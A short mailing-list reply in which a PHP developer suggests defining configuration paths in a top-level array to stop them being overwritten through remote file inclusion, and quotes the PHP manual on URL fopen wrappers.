Re: Highjack?

    I usualy use an array with site configuration which I define at top
included file so you cannot overwrite the configuration paths from
outside the scripts.

<?
      $APP_CFG   = array();
      $APP_CFG["my_path"] = "/somewhere/on/server/";
?>

>From TFM:
"If "URL fopen wrappers" are enabled in PHP (which they are in the
default configuration), you can specify the file to be included using a
URL (via HTTP or other supported wrapper - see Appendix M, List of
Supported Protocols/Wrappers for a list of protocols) instead of a local
pathname. If the target server interprets the target file as PHP code,
variables may be passed to the included file using a URL request string
as used with HTTP GET. This is not strictly speaking the same thing as
including the file and having it inherit the parent file's variable
scope; the script is actually being run on the remote server and the
result is then being included into the local script.

Warning:
Windows versions of PHP prior to PHP 4.3.0 do not support accessing
remote files via this function, even if allow_url_fopen is enabled."

    Andy